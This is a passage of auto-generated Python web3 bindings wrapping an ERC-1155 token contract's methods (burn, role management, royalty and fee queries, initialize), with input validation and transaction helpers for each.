tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, _id).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, account: str, _id: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(account, _id) = self.validate_and_normalize_inputs(account, _id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, _id).estimateGas(
tx_params.as_dict()
)
class BalanceOfBatchMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the balanceOfBatch method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, accounts: List[str], ids: List[int]
):
"""Validate the inputs to the balanceOfBatch method."""
self.validator.assert_valid(
method_name="balanceOfBatch",
parameter_name="accounts",
argument_value=accounts,
)
self.validator.assert_valid(
method_name="balanceOfBatch",
parameter_name="ids",
argument_value=ids,
)
return (accounts, ids)
def call(
self,
accounts: List[str],
ids: List[int],
tx_params: Optional[TxParams] = None,
) -> List[int]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(accounts, ids).call(
tx_params.as_dict()
)
return [int(element) for element in returned]
def send_transaction(
self,
accounts: List[str],
ids: List[int],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(accounts, ids).transact(
tx_params.as_dict()
)
def build_transaction(
self,
accounts: List[str],
ids: List[int],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(accounts, ids).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
accounts: List[str],
ids: List[int],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(accounts, ids) = self.validate_and_normalize_inputs(accounts, ids)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(accounts, ids).estimateGas(
tx_params.as_dict()
)
class BurnMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the burn method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, account: str, _id: int, value: int
):
"""Validate the inputs to the burn method."""
self.validator.assert_valid(
method_name="burn",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name="burn",
parameter_name="id",
argument_value=_id,
)
# safeguard against fractional inputs
_id = int(_id)
self.validator.assert_valid(
method_name="burn",
parameter_name="value",
argument_value=value,
)
# safeguard against fractional inputs
value = int(value)
return (account, _id, value)
def call(
self,
account: str,
_id: int,
value: int,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, _id, value) = self.validate_and_normalize_inputs(
account, _id, value
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(account, _id, value).call(tx_params.as_dict())
def send_transaction(
self,
account: str,
_id: int,
value: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, _id, value) = self.validate_and_normalize_inputs(
account, _id, value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, _id, value).transact(
tx_params.as_dict()
)
def build_transaction(
self,
account: str,
_id: int,
value: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(account, _id, value) = self.validate_and_normalize_inputs(
account, _id, value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, _id, value).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
account: str,
_id: int,
value: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(account, _id, value) = self.validate_and_normalize_inputs(
account, _id, value
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, _id, value).estimateGas(
tx_params.as_dict()
)
class BurnBatchMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the burnBatch method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, account: str, ids: List[int], values: List[int]
):
"""Validate the inputs to the burnBatch method."""
self.validator.assert_valid(
method_name="burnBatch",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
self.validator.assert_valid(
method_name="burnBatch",
parameter_name="ids",
argument_value=ids,
)
self.validator.assert_valid(
method_name="burnBatch",
parameter_name="values",
argument_value=values,
)
return (account, ids, values)
def call(
self,
account: str,
ids: List[int],
values: List[int],
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(account, ids, values) = self.validate_and_normalize_inputs(
account, ids, values
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(account, ids, values).call(tx_params.as_dict())
def send_transaction(
self,
account: str,
ids: List[int],
values: List[int],
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(account, ids, values) = self.validate_and_normalize_inputs(
account, ids, values
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, ids, values).transact(
tx_params.as_dict()
)
def build_transaction(
self,
account: str,
ids: List[int],
values: List[int],
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(account, ids, values) = self.validate_and_normalize_inputs(
account, ids, values
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, ids, values).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
account: str,
ids: List[int],
values: List[int],
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(account, ids, values) = self.validate_and_normalize_inputs(
account, ids, values
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(account, ids, values).estimateGas(
tx_params.as_dict()
)
class ContractTypeMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the contractType method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractUriMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the contractURI method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return str(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractVersionMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the contractVersion method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class GetDefaultRoyaltyInfoMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the getDefaultRoyaltyInfo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Tuple[str, int]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return (
returned[0],
returned[1],
)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class GetPlatformFeeInfoMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getPlatformFeeInfo method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address)
self._underlying_method = contract_function
def call(self, tx_params: Optional[TxParams] = None) -> Tuple[str, int]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method().call(tx_params.as_dict())
return (
returned[0],
returned[1],
)
def send_transaction(
self, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().transact(tx_params.as_dict())
def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
"""Construct calldata to be used as input to the method."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().buildTransaction(tx_params.as_dict())
def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
"""Estimate gas consumption of method call."""
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method().estimateGas(tx_params.as_dict())
class GetRoleAdminMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleAdmin method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str]):
"""Validate the inputs to the getRoleAdmin method."""
self.validator.assert_valid(
method_name="getRoleAdmin",
parameter_name="role",
argument_value=role,
)
return role
def call(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> Union[bytes, str]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role).call(tx_params.as_dict())
return Union[bytes, str](returned)
def send_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).transact(tx_params.as_dict())
def build_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoleMemberMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleMember method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], index: int
):
"""Validate the inputs to the getRoleMember method."""
self.validator.assert_valid(
method_name="getRoleMember",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="getRoleMember",
parameter_name="index",
argument_value=index,
)
# safeguard against fractional inputs
index = int(index)
return (role, index)
def call(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> str:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role, index).call(
tx_params.as_dict()
)
return str(returned)
def send_transaction(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
index: int,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, index) = self.validate_and_normalize_inputs(role, index)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, index).estimateGas(
tx_params.as_dict()
)
class GetRoleMemberCountMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the getRoleMemberCount method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, role: Union[bytes, str]):
"""Validate the inputs to the getRoleMemberCount method."""
self.validator.assert_valid(
method_name="getRoleMemberCount",
parameter_name="role",
argument_value=role,
)
return role
def call(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> int:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role).call(tx_params.as_dict())
return int(returned)
def send_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).transact(tx_params.as_dict())
def build_transaction(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, role: Union[bytes, str], tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(role) = self.validate_and_normalize_inputs(role)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role).estimateGas(tx_params.as_dict())
class GetRoyaltyInfoForTokenMethod(
ContractMethod
): # pylint: disable=invalid-name
"""Various interfaces to the getRoyaltyInfoForToken method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(self, token_id: int):
"""Validate the inputs to the getRoyaltyInfoForToken method."""
self.validator.assert_valid(
method_name="getRoyaltyInfoForToken",
parameter_name="_tokenId",
argument_value=token_id,
)
# safeguard against fractional inputs
token_id = int(token_id)
return token_id
def call(
self, token_id: int, tx_params: Optional[TxParams] = None
) -> Tuple[str, int]:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(token_id).call(tx_params.as_dict())
return (
returned[0],
returned[1],
)
def send_transaction(
self, token_id: int, tx_params: Optional[TxParams] = None
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id).transact(tx_params.as_dict())
def build_transaction(
self, token_id: int, tx_params: Optional[TxParams] = None
) -> dict:
"""Construct calldata to be used as input to the method."""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self, token_id: int, tx_params: Optional[TxParams] = None
) -> int:
"""Estimate gas consumption of method call."""
(token_id) = self.validate_and_normalize_inputs(token_id)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(token_id).estimateGas(
tx_params.as_dict()
)
class GrantRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the grantRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the grantRole method."""
self.validator.assert_valid(
method_name="grantRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="grantRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(role, account).call(tx_params.as_dict())
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
class HasRoleMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the hasRole method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self, role: Union[bytes, str], account: str
):
"""Validate the inputs to the hasRole method."""
self.validator.assert_valid(
method_name="hasRole",
parameter_name="role",
argument_value=role,
)
self.validator.assert_valid(
method_name="hasRole",
parameter_name="account",
argument_value=account,
)
account = self.validate_and_checksum_address(account)
return (role, account)
def call(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> bool:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
returned = self._underlying_method(role, account).call(
tx_params.as_dict()
)
return bool(returned)
def send_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).transact(
tx_params.as_dict()
)
def build_transaction(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).buildTransaction(
tx_params.as_dict()
)
def estimate_gas(
self,
role: Union[bytes, str],
account: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(role, account) = self.validate_and_normalize_inputs(role, account)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(role, account).estimateGas(
tx_params.as_dict()
)
class InitializeMethod(ContractMethod): # pylint: disable=invalid-name
"""Various interfaces to the initialize method."""
def __init__(
self,
web3_or_provider: Union[Web3, BaseProvider],
contract_address: str,
contract_function: ContractFunction,
validator: Validator = None,
):
"""Persist instance data."""
super().__init__(web3_or_provider, contract_address, validator)
self._underlying_method = contract_function
def validate_and_normalize_inputs(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
royalty_recipient: str,
royalty_bps: int,
platform_fee_bps: int,
platform_fee_recipient: str,
):
"""Validate the inputs to the initialize method."""
self.validator.assert_valid(
method_name="initialize",
parameter_name="_defaultAdmin",
argument_value=default_admin,
)
default_admin = self.validate_and_checksum_address(default_admin)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_name",
argument_value=name,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_symbol",
argument_value=symbol,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_contractURI",
argument_value=contract_uri,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_trustedForwarders",
argument_value=trusted_forwarders,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_primarySaleRecipient",
argument_value=primary_sale_recipient,
)
primary_sale_recipient = self.validate_and_checksum_address(
primary_sale_recipient
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_royaltyRecipient",
argument_value=royalty_recipient,
)
royalty_recipient = self.validate_and_checksum_address(
royalty_recipient
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_royaltyBps",
argument_value=royalty_bps,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_platformFeeBps",
argument_value=platform_fee_bps,
)
self.validator.assert_valid(
method_name="initialize",
parameter_name="_platformFeeRecipient",
argument_value=platform_fee_recipient,
)
platform_fee_recipient = self.validate_and_checksum_address(
platform_fee_recipient
)
return (
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
)
def call(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
royalty_recipient: str,
royalty_bps: int,
platform_fee_bps: int,
platform_fee_recipient: str,
tx_params: Optional[TxParams] = None,
) -> None:
"""Execute underlying contract method via eth_call.
:param tx_params: transaction parameters
:returns: the return value of the underlying method.
"""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
)
tx_params = super().normalize_tx_params(tx_params)
self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
).call(tx_params.as_dict())
def send_transaction(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
royalty_recipient: str,
royalty_bps: int,
platform_fee_bps: int,
platform_fee_recipient: str,
tx_params: Optional[TxParams] = None,
) -> Union[HexBytes, bytes]:
"""Execute underlying contract method via eth_sendTransaction.
:param tx_params: transaction parameters
"""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
).transact(tx_params.as_dict())
def build_transaction(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
royalty_recipient: str,
royalty_bps: int,
platform_fee_bps: int,
platform_fee_recipient: str,
tx_params: Optional[TxParams] = None,
) -> dict:
"""Construct calldata to be used as input to the method."""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
)
tx_params = super().normalize_tx_params(tx_params)
return self._underlying_method(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
).buildTransaction(tx_params.as_dict())
def estimate_gas(
self,
default_admin: str,
name: str,
symbol: str,
contract_uri: str,
trusted_forwarders: List[str],
primary_sale_recipient: str,
royalty_recipient: str,
royalty_bps: int,
platform_fee_bps: int,
platform_fee_recipient: str,
tx_params: Optional[TxParams] = None,
) -> int:
"""Estimate gas consumption of method call."""
(
default_admin,
name,
symbol,
contract_uri,
trusted_forwarders,
primary_sale_recipient,
royalty_recipient,
royalty_bps,
platform_fee_bps,
platform_fee_recipient,
) = self.validate_and_normalize_inputs(
default_admin,
name,
symbol,
contract_uri,
